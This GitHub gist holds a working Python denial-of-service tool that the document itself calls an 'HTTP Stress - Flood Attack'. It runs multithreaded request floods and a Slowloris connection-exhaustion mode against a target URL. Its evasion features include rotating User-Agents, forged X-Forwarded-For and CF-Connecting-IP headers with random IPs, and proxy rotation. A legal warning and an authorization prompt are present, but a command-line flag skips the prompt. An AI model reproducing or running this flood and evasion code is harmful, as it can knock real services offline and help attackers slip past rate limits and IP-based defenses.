Skip to content

Instantly share code, notes, and snippets.

@marcostolosa
Created September 3, 2025 11:13
Show Gist options
  • Save marcostolosa/02e6fb44f31c42dbeddc242eefba602d to your computer and use it in GitHub Desktop.
Save marcostolosa/02e6fb44f31c42dbeddc242eefba602d to your computer and use it in GitHub Desktop.
HTTP Stress - Flood Attack
#!/usr/bin/env python3
"""
HTTP Stress Testing Tool - Educational & Authorized Pentest Only
Author: Security Research Team
Version: 2.0 Professional Edition
⚠️ AVISO LEGAL: Use APENAS com autorização escrita do proprietário do sistema
Violação = Crime (Lei 12.737/2012 - Brasil) | CFAA (EUA)
"""
import threading
import requests
import time
import random
import string
import argparse
import json
import socket
import ssl
import hashlib
from datetime import datetime
from collections import deque
from urllib.parse import urlparse
import warnings
import sys
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
import signal
# Desabilita avisos SSL para testes
warnings.filterwarnings('ignore', category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
class Colors:
    """ANSI escape sequences used to colour terminal output."""

    # Bright foreground colours (SGR codes 91-97).
    RED = "\x1b[91m"
    GREEN = "\x1b[92m"
    YELLOW = "\x1b[93m"
    BLUE = "\x1b[94m"
    PURPLE = "\x1b[95m"
    CYAN = "\x1b[96m"
    WHITE = "\x1b[97m"

    # Text attributes: RESET clears all styling, BOLD switches on bold.
    RESET = "\x1b[0m"
    BOLD = "\x1b[1m"
class HTTPStressTester:
def __init__(self, target_url, config):
self.target_url = target_url
self.config = config
self.stats = {
'total_requests': 0,
'successful': 0,
'failed': 0,
'status_codes': {},
'response_times': deque(maxlen=1000),
'bytes_sent': 0,
'bytes_received': 0,
'start_time': time.time()
}
self.running = True
self.lock = threading.Lock()
# User-Agents realistas e atualizados
self.user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 Safari/17.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0.0.0",
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) Mobile/15E148",
"Mozilla/5.0 (Android 14; Mobile; rv:120.0) Firefox/120.0",
"curl/8.4.0",
"Python-urllib/3.11",
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Custom-Scanner/1.0 (Pentest Tool)"
]
# Proxies para rotação (opcional)
self.proxies = self.load_proxies() if config.get('proxy_file') else []
# Headers adicionais para evasão
self.extra_headers = [
{"X-Forwarded-For": self.generate_random_ip()},
{"X-Real-IP": self.generate_random_ip()},
{"X-Originating-IP": self.generate_random_ip()},
{"Client-IP": self.generate_random_ip()},
{"CF-Connecting-IP": self.generate_random_ip()},
]
def generate_random_ip(self):
"""Gera IP aleatório para spoofing de headers"""
return f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}"
def load_proxies(self):
"""Carrega lista de proxies de arquivo"""
proxies = []
if os.path.exists(self.config.get('proxy_file', '')):
with open(self.config['proxy_file'], 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
proxies.append({'http': line, 'https': line})
return proxies
def generate_payload(self, attack_type='random'):
"""Gera diferentes tipos de payload baseado no ataque"""
payloads = {
'random': lambda: ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(100, 1000))),
'json': lambda: json.dumps({
'user': ''.join(random.choices(string.ascii_letters, k=10)),
'data': ''.join(random.choices(string.ascii_letters + string.digits, k=500)),
'timestamp': str(datetime.now()),
'session': hashlib.md5(str(random.random()).encode()).hexdigest()
}),
'xml': lambda: f"""<?xml version="1.0"?>
<request>
<user>{random.randint(1000, 9999)}</user>
<data>{''.join(random.choices(string.ascii_letters, k=200))}</data>
<timestamp>{datetime.now()}</timestamp>
</request>""",
'form': lambda: '&'.join([f"field{i}={''.join(random.choices(string.ascii_letters, k=50))}"
for i in range(random.randint(5, 20))]),
'multipart': lambda: self.generate_multipart_data(),
'slowloris': lambda: ''.join(random.choices(string.ascii_letters, k=1)), # Pequeno para Slowloris
'heavy': lambda: ''.join(random.choices(string.printable, k=random.randint(5000, 10000))), # Payload pesado
}
return payloads.get(attack_type, payloads['random'])()
def generate_multipart_data(self):
"""Gera dados multipart/form-data"""
boundary = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
data = f"--{boundary}\r\n"
data += f'Content-Disposition: form-data; name="file"; filename="test.txt"\r\n'
data += "Content-Type: text/plain\r\n\r\n"
data += ''.join(random.choices(string.ascii_letters, k=1000))
data += f"\r\n--{boundary}--\r\n"
return data
def get_random_headers(self):
"""Retorna headers randomizados para evasão"""
headers = {
"User-Agent": random.choice(self.user_agents),
"Accept": random.choice([
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"application/json, text/plain, */*",
"*/*",
"text/html,application/xhtml+xml"
]),
"Accept-Language": random.choice(["en-US,en;q=0.5", "pt-BR,pt;q=0.8", "es-ES,es;q=0.9"]),
"Accept-Encoding": random.choice(["gzip, deflate", "gzip, deflate, br", "identity"]),
"Cache-Control": random.choice(["no-cache", "max-age=0", "no-store"]),
"Connection": random.choice(["keep-alive", "close"]) if not self.config.get('slowloris') else "keep-alive",
}
# Adiciona headers extras aleatoriamente
if random.random() > 0.5:
headers.update(random.choice(self.extra_headers))
# Headers específicos por tipo de ataque
if self.config.get('attack_type') == 'json':
headers["Content-Type"] = "application/json"
elif self.config.get('attack_type') == 'xml':
headers["Content-Type"] = "application/xml"
elif self.config.get('attack_type') == 'multipart':
headers["Content-Type"] = f"multipart/form-data; boundary={random.randint(1000000, 9999999)}"
else:
headers["Content-Type"] = "application/x-www-form-urlencoded"
return headers
def perform_request(self, session, method='POST'):
"""Executa uma requisição HTTP com métricas"""
proxy = random.choice(self.proxies) if self.proxies else None
headers = self.get_random_headers()
payload = self.generate_payload(self.config.get('attack_type', 'random'))
start_time = time.time()
try:
if method == 'POST':
response = session.post(
self.target_url,
data=payload,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 10),
verify=False,
allow_redirects=self.config.get('follow_redirects', False)
)
elif method == 'GET':
response = session.get(
self.target_url,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 10),
verify=False,
allow_redirects=self.config.get('follow_redirects', False)
)
elif method == 'HEAD':
response = session.head(
self.target_url,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 5),
verify=False
)
else: # PUT, DELETE, PATCH, etc
response = session.request(
method,
self.target_url,
data=payload,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 10),
verify=False
)
response_time = time.time() - start_time
# Atualiza estatísticas
with self.lock:
self.stats['total_requests'] += 1
self.stats['successful'] += 1
self.stats['status_codes'][response.status_code] = \
self.stats['status_codes'].get(response.status_code, 0) + 1
self.stats['response_times'].append(response_time)
self.stats['bytes_sent'] += len(payload.encode()) if payload else 0
self.stats['bytes_received'] += len(response.content)
return True, response.status_code, response_time
except requests.exceptions.Timeout:
with self.lock:
self.stats['total_requests'] += 1
self.stats['failed'] += 1
return False, 'TIMEOUT', 0
except requests.exceptions.ConnectionError:
with self.lock:
self.stats['total_requests'] += 1
self.stats['failed'] += 1
return False, 'CONNECTION_ERROR', 0
except Exception as e:
with self.lock:
self.stats['total_requests'] += 1
self.stats['failed'] += 1
return False, str(e), 0
def slowloris_attack(self):
"""Implementa ataque Slowloris (mantém conexões abertas)"""
sockets = []
# Cria sockets iniciais
for _ in range(self.config.get('threads', 50)):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
parsed = urlparse(self.target_url)
host = parsed.hostname
port = parsed.port or (443 if parsed.scheme == 'https' else 80)
if parsed.scheme == 'https':
sock = ssl.wrap_socket(sock)
sock.connect((host, port))
sock.send(f"GET {parsed.path or '/'} HTTP/1.1\r\n".encode())
sock.send(f"Host: {host}\r\n".encode())
sock.send(f"User-Agent: {random.choice(self.user_agents)}\r\n".encode())
sockets.append(sock)
with self.lock:
self.stats['total_requests'] += 1
self.stats['successful'] += 1
except Exception as e:
with self.lock:
self.stats['failed'] += 1
# Mantém conexões vivas
while self.running:
for sock in sockets:
try:
sock.send(f"X-header-{random.randint(1,5000)}: {random.randint(1,5000)}\r\n".encode())
with self.lock:
self.stats['bytes_sent'] += 50
except:
sockets.remove(sock)
try:
# Recria socket morto
new_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
new_sock.settimeout(4)
if parsed.scheme == 'https':
new_sock = ssl.wrap_socket(new_sock)
new_sock.connect((host, port))
new_sock.send(f"GET {parsed.path or '/'} HTTP/1.1\r\n".encode())
new_sock.send(f"Host: {host}\r\n".encode())
sockets.append(new_sock)
except:
pass
time.sleep(random.uniform(10, 20))
def worker_thread(self):
"""Thread worker principal para ataques normais"""
session = requests.Session()
# Configurações de performance
adapter = requests.adapters.HTTPAdapter(
pool_connections=100,
pool_maxsize=100,
max_retries=0
)
session.mount('http://', adapter)
session.mount('https://', adapter)
methods = self.config.get('methods', ['POST'])
while self.running:
method = random.choice(methods)
success, status, response_time = self.perform_request(session, method)
if self.config.get('verbose'):
timestamp = datetime.now().strftime('%H:%M:%S')
if success:
color = Colors.GREEN if status == 200 else Colors.YELLOW
print(f"{color}[{timestamp}] {method} → Status: {status} | Time: {response_time:.3f}s{Colors.RESET}")
else:
print(f"{Colors.RED}[{timestamp}] {method} → Failed: {status}{Colors.RESET}")
# Delay entre requisições
delay = self.config.get('delay', 0)
if delay > 0:
time.sleep(random.uniform(delay * 0.5, delay * 1.5))
def print_stats(self):
"""Exibe estatísticas em tempo real"""
while self.running:
time.sleep(self.config.get('stats_interval', 5))
with self.lock:
elapsed = time.time() - self.stats['start_time']
rps = self.stats['total_requests'] / elapsed if elapsed > 0 else 0
avg_response = sum(self.stats['response_times']) / len(self.stats['response_times']) \
if self.stats['response_times'] else 0
success_rate = (self.stats['successful'] / self.stats['total_requests'] * 100) \
if self.stats['total_requests'] > 0 else 0
print(f"\n{Colors.CYAN}{'='*60}")
print(f"{Colors.BOLD}📊 ESTATÍSTICAS DO TESTE - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.RESET}")
print(f"{Colors.CYAN}{'='*60}{Colors.RESET}")
print(f"⏱️ Tempo decorrido: {elapsed:.1f}s")
print(f"📨 Total de requisições: {self.stats['total_requests']}")
print(f"✅ Sucesso: {self.stats['successful']} ({success_rate:.1f}%)")
print(f"❌ Falhas: {self.stats['failed']}")
print(f"⚡ Requisições/seg: {rps:.2f}")
print(f"📊 Tempo médio resposta: {avg_response:.3f}s")
print(f"📤 Bytes enviados: {self.stats['bytes_sent'] / 1024:.2f} KB")
print(f"📥 Bytes recebidos: {self.stats['bytes_received'] / 1024:.2f} KB")
if self.stats['status_codes']:
print(f"\n{Colors.YELLOW}Status Codes:{Colors.RESET}")
for code, count in sorted(self.stats['status_codes'].items()):
percentage = (count / self.stats['total_requests'] * 100)
bar = '█' * int(percentage / 2)
print(f" {code}: {count:5d} ({percentage:5.1f}%) {bar}")
print(f"{Colors.CYAN}{'='*60}{Colors.RESET}")
def start(self):
"""Inicia o teste de stress"""
print(f"\n{Colors.PURPLE}{Colors.BOLD}")
print("╔═══════════════════════════════════════════════════════════╗")
print("║ HTTP STRESS TESTER - PROFESSIONAL v2.0 ║")
print("║ 🔒 AUTHORIZED USE ONLY 🔒 ║")
print("╚═══════════════════════════════════════════════════════════╝")
print(f"{Colors.RESET}")
print(f"\n{Colors.YELLOW}⚠️ AVISO LEGAL:{Colors.RESET}")
print("Este teste deve ser executado APENAS com autorização escrita!")
print("Uso não autorizado é CRIME federal (Lei 12.737/2012 - Brasil)")
# Confirmação de segurança
if not self.config.get('skip_confirmation'):
confirm = input(f"\n{Colors.RED}Você possui autorização escrita para testar {self.target_url}? (yes/no): {Colors.RESET}")
if confirm.lower() != 'yes':
print(f"{Colors.RED}Teste cancelado. Execute apenas com autorização!{Colors.RESET}")
return
print(f"\n{Colors.GREEN}🚀 Iniciando teste de stress...{Colors.RESET}")
print(f"🎯 Alvo: {self.target_url}")
print(f"🧵 Threads: {self.config.get('threads', 10)}")
print(f"⚡ Tipo de ataque: {self.config.get('attack_type', 'random')}")
print(f"🔄 Métodos: {', '.join(self.config.get('methods', ['POST']))}")
# Inicia thread de estatísticas
stats_thread = threading.Thread(target=self.print_stats)
stats_thread.daemon = True
stats_thread.start()
# Escolhe tipo de ataque
if self.config.get('slowloris'):
print(f"\n{Colors.YELLOW}Executando ataque Slowloris...{Colors.RESET}")
self.slowloris_attack()
else:
# Cria pool de threads
with ThreadPoolExecutor(max_workers=self.config.get('threads', 10)) as executor:
futures = []
for _ in range(self.config.get('threads', 10)):
future = executor.submit(self.worker_thread)
futures.append(future)
try:
# Aguarda conclusão ou interrupção
for future in as_completed(futures):
pass
except KeyboardInterrupt:
print(f"\n\n{Colors.YELLOW}⚠️ Interrompendo teste...{Colors.RESET}")
self.running = False
def stop(self):
    """Stop the run and print the final summary report.

    Sets ``self.running`` to False so that loops polling the flag exit,
    then prints the duration, request count, average request rate and
    success rate taken from ``self.stats``.

    The report is printed at most once per instance. ``main`` calls this
    method from its SIGINT handler and again from its ``finally`` clause,
    which used to print the report twice. The rates fall back to 0 when no
    request was recorded or no time has elapsed, so stopping before any
    traffic was sent (for example after declining the authorization
    prompt) no longer raises ZeroDivisionError.
    """
    self.running = False

    # Idempotence guard. getattr is used because __init__ does not define
    # this flag.
    if getattr(self, '_final_report_printed', False):
        return
    self._final_report_printed = True

    # The counters are read without taking self.lock on purpose: this
    # method can run inside a signal handler on the main thread, and
    # threading.Lock is not reentrant, so acquiring it here could deadlock
    # if the interrupted code was holding it.
    total = self.stats['total_requests']
    succeeded = self.stats['successful']
    elapsed = time.time() - self.stats['start_time']

    rate = total / elapsed if elapsed > 0 else 0.0
    success_pct = succeeded / total * 100 if total > 0 else 0.0

    # Final statistics
    print(f"\n{Colors.GREEN}{'='*60}")
    print(f"{Colors.BOLD}📊 RELATÓRIO FINAL{Colors.RESET}")
    print(f"{Colors.GREEN}{'='*60}{Colors.RESET}")
    print(f"Duração total: {elapsed:.1f} segundos")
    print(f"Total de requisições: {total}")
    print(f"Taxa média: {rate:.2f} req/s")
    print(f"Taxa de sucesso: {success_pct:.1f}%")
    print(f"{Colors.GREEN}{'='*60}{Colors.RESET}")
def main():
parser = argparse.ArgumentParser(
description="HTTP Stress Tester - Professional Pentesting Tool",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Exemplos de uso:
python3 stress_test.py https://authorized-target.com -t 50 -d 0.1
python3 stress_test.py https://lab.local --slowloris
python3 stress_test.py https://api.test.com --attack-type json --methods POST PUT
python3 stress_test.py https://target.com --proxy-file proxies.txt
"""
)
# Argumentos principais
parser.add_argument("url", help="URL alvo (deve ter autorização!)")
parser.add_argument("-t", "--threads", type=int, default=10,
help="Número de threads concorrentes (padrão: 10)")
parser.add_argument("-d", "--delay", type=float, default=0,
help="Delay entre requisições em segundos (padrão: 0)")
# Tipos de ataque
parser.add_argument("--attack-type", choices=['random', 'json', 'xml', 'form',
'multipart', 'slowloris', 'heavy'],
default='random', help="Tipo de payload do ataque")
parser.add_argument("--slowloris", action="store_true",
help="Executa ataque Slowloris (mantém conexões abertas)")
# Métodos HTTP
parser.add_argument("--methods", nargs='+',
default=['POST'],
choices=['GET', 'POST', 'PUT', 'DELETE', 'HEAD', 'PATCH', 'OPTIONS'],
help="Métodos HTTP a usar (padrão: POST)")
# Configurações avançadas
parser.add_argument("--timeout", type=int, default=10,
help="Timeout para requisições em segundos (padrão: 10)")
parser.add_argument("--proxy-file", help="Arquivo com lista de proxies")
parser.add_argument("--follow-redirects", action="store_true",
help="Segue redirecionamentos HTTP")
parser.add_argument("--stats-interval", type=int, default=5,
help="Intervalo de atualização de estatísticas em segundos")
# Output e debug
parser.add_argument("-v", "--verbose", action="store_true",
help="Modo verbose - mostra cada requisição")
parser.add_argument("-q", "--quiet", action="store_true",
help="Modo silencioso - apenas estatísticas finais")
parser.add_argument("--skip-confirmation", action="store_true",
help="Pula confirmação de autorização (USE COM CUIDADO!)")
args = parser.parse_args()
# Validação de URL
parsed = urlparse(args.url)
if not parsed.scheme or not parsed.netloc:
print(f"{Colors.RED}❌ URL inválida! Use formato: https://example.com{Colors.RESET}")
sys.exit(1)
# Configuração
config = {
'threads': args.threads,
'delay': args.delay,
'attack_type': args.attack_type,
'slowloris': args.slowloris,
'methods': args.methods,
'timeout': args.timeout,
'proxy_file': args.proxy_file,
'follow_redirects': args.follow_redirects,
'stats_interval': args.stats_interval,
'verbose': args.verbose,
'quiet': args.quiet,
'skip_confirmation': args.skip_confirmation
}
# Inicializa e executa
tester = HTTPStressTester(args.url, config)
# Handler para CTRL+C
def signal_handler(sig, frame):
print(f"\n{Colors.YELLOW}Recebido sinal de interrupção...{Colors.RESET}")
tester.stop()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
try:
tester.start()
except Exception as e:
print(f"{Colors.RED}❌ Erro: {e}{Colors.RESET}")
sys.exit(1)
finally:
tester.stop()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment